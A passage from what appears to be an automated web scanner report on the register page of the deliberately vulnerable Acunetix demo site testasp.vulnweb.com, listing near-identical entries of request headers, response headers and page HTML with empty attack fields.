type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:02 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a 